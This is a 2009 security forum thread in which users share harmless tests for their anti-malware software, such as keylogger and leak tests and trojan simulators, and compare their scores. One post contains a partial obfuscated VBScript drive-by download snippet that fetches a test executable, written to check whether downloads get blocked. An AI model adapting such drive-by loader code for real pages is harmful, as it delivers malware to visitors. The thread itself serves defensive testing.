Security Tests

Discussion in 'other software & services' started by Toby75, May 24, 2009.

Thread Status:
Not open for further replies.
  1. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
    Hi All,

    I thought it would be interesting if we could start a thread listing all of the different types of security tests that you have used to test your antimalware software. Remember, only tests that are harmless. No live malware. However, if you come across a test that temporarily disables your mouse or something like this....this is considered harmless IMO.

    I will start with a well known keylogging test:
    http://www.zemana.com/keylogger_test.aspx

    Looking forward to how many we can come up with!

    Thanks in Advance,
    Toby
     
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Security tests I've seen require you to permit the test executable to download/run so as to see how your anti-malware solution deals with the exploit as it is executing. I'm interested in testing how malware can be prevented from downloading/running.

    I'm not aware of sites that provide these types of tests for those who want to test keeping malware completely off the computer. Maybe someone is aware of some and can post them.

    So, I've created my own tests.

    Here, I put your keylogger test URL into a drive-by exploit code to test how it can be blocked from downloading:

    Code:
    <script language="VBScript">
    on error resume next
    OOOOOOOOOOOOOwwwwwww ="[B][COLOR="DarkRed"]http://download.zemana.com/Products/Simulations/keyboard.exe[/COLOR][/B]"
    Set eeeeeeeeeeeennnnnnnnnnn = document.createElement("obj"&"ect")
    
    ...
    
    keylog.gif



    ----
    rich
     
    Last edited: May 24, 2009
  3. icr

    icr Registered Member

    Joined:
    Sep 6, 2008
    Posts:
    1,588
    Location:
    Mumbai
    What was your test score mine was bad 60:'(
     
  4. PROROOTECT

    PROROOTECT Registered Member

    Joined:
    May 5, 2008
    Posts:
    1,102
    Location:
    HERE ...Fort Lee, NJ
    Hi,

    I have 35 links in my Favorites folder 'TESTS' ...

    Here are some:

    * File test (Wilders ....): https://www.wilderssecurity.com/showthread.php?t=215060

    * HideProc: http://www.iterati.org/Developers/HideProc/Default.aspx

    * Trojan Simulator: http://www.misec.net/trojansimulator/

    * FireHole: http://keir.net/firehole.html

    * lol Security Testing: http://lists.thedatalist.com/pages/Security_Testing.php

    * Proxomitron.Info - Tests Pages: http://www.proxomitron.info/tests/index.html

    *Peacekeeper - The Browser Benchmark: http://service.futuremark.com/peacekeeper/index.action

    * Test everything: http://tester.jonasjohn.de/

    * ... and W.O.P.R. ( PICTURES of user experience of infection) for little fun: http://w-o-p-r.dk/xoomer/wopr.xoomer.pictures.asp


    P:thumb:
     
  5. Sully

    Sully Registered Member

    Joined:
    Dec 23, 2005
    Posts:
    3,719
    I am not sure what that test is really supposed to tell me, but I found it amusing. Here is a screen of my score, a 280. I have been playing with Cyberhawk on this machine the past week again, so it stops 4 of the vulnerabilities. Actually stopping the vulnerabilities by CH meant the test stopped lol. Note also that I have no firewall, only some IPsec rules.

    The test .exe was located in my downloads directory, which is set in SRP as Basic User. Also Sandboxie is set to force that directory to no network access, but I started it without SB. So as either CH would stop, or any browser services starting as both Basic User and forced into Sandboxie, you see the results. And my system is in state of playing ATM, so maybe a tighter config would have been different.

    Sul.

    Comode_noSB_inFD.jpg
     
  6. Sully

    Sully Registered Member

    Joined:
    Dec 23, 2005
    Posts:
    3,719
    That is funny. I got a 260 using only sandboxie, and a 260 with no sandboxie using only SRP.

    Sul.
     
  7. Creer

    Creer Registered Member

    Joined:
    Jun 29, 2008
    Posts:
    1,345
  8. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
  9. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,408
    Confirmed.
    Site's down here too.
     
  10. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    down for me too.
     
  11. PROROOTECT

    PROROOTECT Registered Member

    Joined:
    May 5, 2008
    Posts:
    1,102
    Location:
    HERE ...Fort Lee, NJ
  12. Coolio10

    Coolio10 Registered Member

    Joined:
    Sep 1, 2006
    Posts:
    1,124
    Same.
     
  13. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
    Thank You PROROOTECT! :thumb:
     
  14. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
  15. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    Got between 20 and 60 using ssm and threatfire.

    funny thing is most of the attempts were logged in threatfire but marked as ALLOWED !

    Have never seen that before except where I explicitly allowed something myself.

    Test managed to scare me a bit despite not really believing it means anything !
     
  16. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
    Which test? The one I couldn't run? Vista or XP?
     
  17. PROROOTECT

    PROROOTECT Registered Member

    Joined:
    May 5, 2008
    Posts:
    1,102
    Location:
    HERE ...Fort Lee, NJ
    Hey testers!

    I see that you test also my IQ level. You - ssj100! Your speech in Oxford English: 'It's up for me' - I still do not understand until the end, this beautiful expression ... Thanks ...
     
  18. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
  19. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    Just wondering - It looked like you we were clicking allow when you got the alert prompt from DefenseWall ?

    Why would the test record "Protected" if you were allowing the alert o_O

    :blink:
     
  20. PROROOTECT

    PROROOTECT Registered Member

    Joined:
    May 5, 2008
    Posts:
    1,102
    Location:
    HERE ...Fort Lee, NJ
  21. Creer

    Creer Registered Member

    Joined:
    Jun 29, 2008
    Posts:
    1,345
    Not exactly, DW popup inform about running/executing malicious code in my system, of course i could press Terminate button when i got this kind of notification but on this presentation I wanted to show all test process.

    Also please note that if you don't use Terminate button on notification DW window, then malicious application will be still runing but under limited rights enviroment DW so it still won't harm you.

    If you see that smth wrong with your system - i mean you see many popups opening windows in the same time, then just press WIN+ALT+A combination and automatically DW close all Untrusted processes runing.
     
    Last edited: May 29, 2009
Loading...
Thread Status:
Not open for further replies.